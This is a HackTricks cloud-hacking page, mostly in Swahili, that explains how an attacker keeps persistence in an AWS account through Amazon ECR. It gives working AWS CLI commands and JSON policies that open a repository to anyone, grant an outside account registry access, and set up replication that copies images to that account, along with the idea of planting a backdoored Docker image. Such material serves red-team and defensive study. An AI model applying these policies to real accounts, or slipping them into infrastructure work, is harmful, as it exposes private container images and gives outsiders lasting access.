AWS - ECR Persistence

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

ECR

Kwa maelezo zaidi angalia:

AWS - ECR Enum

Picha ya Docker Iliyojificha yenye Kodu Mbaya

Mshambuliaji anaweza kupakia picha ya Docker yenye kodu mbaya kwenye hifadhi ya ECR na kuitumia kudumisha uendelevu katika akaunti ya AWS inayolengwa. Mshambuliaji anaweza kisha kupeleka picha hiyo mbaya kwa huduma mbalimbali ndani ya akaunti, kama vile Amazon ECS au EKS, kwa njia ya siri.

Sera ya Hifadhi

Ongeza sera kwa hifadhi moja ikikupa wewe (au kila mtu) ufikiaji wa hifadhi:

aws ecr set-repository-policy \
--repository-name cluster-autoscaler \
--policy-text file:///tmp/my-policy.json

# With a .json such as

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

Kumbuka kwamba ECR inahitaji kwamba watumiaji wawe na ruhusa ya kufanya simu kwa ecr:GetAuthorizationToken API kupitia sera ya IAM kabla ya kuweza kuthibitisha kwenye rejista na kusukuma au kuvuta picha yoyote kutoka kwa hifadhi yoyote ya Amazon ECR.

Sera ya Rejista & Urejeleaji wa Makaratasi Mbalimbali

Inawezekana kurejeleza moja kwa moja rejista katika akaunti ya nje kwa kuunda urejeleaji wa makarata mbalimbali, ambapo unahitaji kuashiria akaunti ya nje ambapo unataka kurejeleza rejista hiyo.

Kwanza, unahitaji kutoa akaunti ya nje ufikiaji juu ya rejista kwa kutumia sera ya rejista kama:

aws ecr put-registry-policy --policy-text file://my-policy.json

# With a .json like:

{
"Sid": "asdasd",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::947247140022:root"
},
"Action": [
"ecr:CreateRepository",
"ecr:ReplicateImage"
],
"Resource": "arn:aws:ecr:eu-central-1:947247140022:repository/*"
}

Kisha tumia usanidi wa nakala:

aws ecr put-replication-configuration \
--replication-configuration file://replication-settings.json \
--region us-west-2

# Having the .json a content such as:
{
"rules": [{
"destinations": [{
"region": "destination_region",
"registryId": "destination_accountId"
}],
"repositoryFilters": [{
"filter": "repository_prefix_name",
"filterType": "PREFIX_MATCH"
}]
}]
}

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - EC2 Persistence NextAWS - ECS Persistence

Last updated 1 month ago